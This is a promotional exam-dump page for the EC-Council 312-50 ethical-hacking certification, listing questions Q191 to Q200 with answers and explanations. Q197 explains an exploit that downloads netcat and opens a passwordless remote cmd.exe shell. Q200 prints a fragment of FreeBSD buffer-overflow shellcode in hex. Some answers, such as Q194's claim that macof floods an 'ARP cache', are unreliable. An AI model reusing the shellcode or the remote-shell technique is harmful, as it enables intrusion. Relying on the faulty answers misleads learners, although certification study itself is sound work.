Proper study guides for Most recent EC-Council Ethical Hacking and Countermeasures (CEHv6) certified begins with EC-Council 312-50 preparation products which designed to deliver the Guaranteed 312-50 questions by making you pass the 312-50 test at your first time. Try the free 312-50 demo right now.
♥♥ 2021 NEW RECOMMEND ♥♥
Free VCE & PDF File for EC-Council 312-50 Real Exam (Full Version!)
★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions
Free Instant Download NEW 312-50 Exam Dumps (PDF & VCE):
Available on:
http://www.surepassexam.com/312-50-exam-dumps.html
Q191. In the context of Trojans, what is the definition of a Wrapper?
A. An encryption tool to protect the Trojan.
B. A tool used to bind the Trojan with legitimate file.
C. A tool used to encapsulated packets within a new header and footer.
D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan.
Answer: B
Explanation: These wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code.
Q192. This TCP flag instructs the sending system to transmit all buffered data immediately.
A. SYN
B. RST
C. PSH
D. URG
E. FIN
Answer: C
Q193. Which of the following is not an effective countermeasure against replay attacks?
A. Digital signatures
B. Time Stamps
C. System identification
D. Sequence numbers
Answer: C
Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. Effective countermeasures should be anything that makes it hard to delay or replay the packet (time stamps and sequence numbers) or anything that prove the package is received as it was sent from the original sender (digital signature)
Q194. Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result?
A. The switches will drop into hub mode if the ARP cache is successfully flooded.
B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.
C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.
D. The switches will route all traffic to the broadcast address created collisions.
Answer: A
Q195. An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application.
Which of the following strategies can be used to defeat detection by a network-based IDS application? (Choose the best answer)
A. Create a network tunnel.
B. Create a multiple false positives.
C. Create a SYN flood.
D. Create a ping flood.
Answer: A
Explanation: Certain types of encryption presents challenges to network-based intrusion detection and may leave the IDS blind to certain attacks, where a host-based IDS analyzes the data after it has been decrypted.
Q196. While doing fast scan using –F option, which file is used to list the range of ports to scan by nmap?
A. services
B. nmap-services
C. protocols
D. ports
Answer: B
Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system.
Q197. What is the expected result of the following exploit?
A. Opens up a telnet listener that requires no username or password.
B. Create a FTP server with write permissions enabled.
C. Creates a share called “sasfile” on the target system.
D. Creates an account with a user name of Anonymous and a password of noone@nowhere.com.
Answer: A
Explanation: The script being depicted is in perl (both msadc.pl and the script their using as a wrapper) -- $port, $your, $user, $pass, $host are variables that hold the port # of a DNS server, an IP, username, and FTP password. $host is set to argument variable 0 (which means the string typed directly after the command). Essentially what happens is it connects to an FTP server and downloads nc.exe (the TCP/IP swiss-army knife -- netcat) and uses nc to open a TCP port spawning cmd.exe (cmd.exe is the Win32 DOS shell on NT/2000/2003/XP), cmd.exe when spawned requires NO username or password and has the permissions of the username it is being executed as (probably guest in this instance, although it could be administrator). The #'s in the script means the text following is a comment, notice the last line in particular, if the # was removed the script would spawn a connection to itself, the host system it was running on.
Q198. In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building’s center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack.
Which of the following statements is true?
A. With the 300 feet limit of a wireless signal, Ulf’s network is safe.
B. Wireless signals can be detected from miles away, Ulf’s network is not safe.
C. Ulf’s network will be safe but only of he doesn’t switch to 802.11a.
D. Ulf’s network will not be safe until he also enables WEP.
Answer: D
Q199. While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80.
What can you infer from this observation?
A. They are using Windows based web servers.
B. They are using UNIX based web servers.
C. They are not using an intrusion detection system.
D. They are not using a stateful inspection firewall.
Answer: D
Explanation: If they used a stateful inspection firewall this firewall would know if there has been a SYN-ACK before the ACK.
Q200. #define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),
(((x)&0xff0000)16), (((x)&0xff000000)24)
char infin_loop[]=
/* for testing purposes */
"xEBxFE";
char bsdcode[] =
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"
"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"
"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"
"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"
"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"
"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"
"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"
"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"
"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"
"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"
"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"
"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"
"x67x6cx69x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;
The following exploit code is extracted from what kind of attack?
A. Remote password cracking attack
B. SQL Injection
C. Distributed Denial of Service
D. Cross Site Scripting
E. Buffer Overflow
Answer: E
Explanation: This is a buffer overflow with it’s payload in hex format.
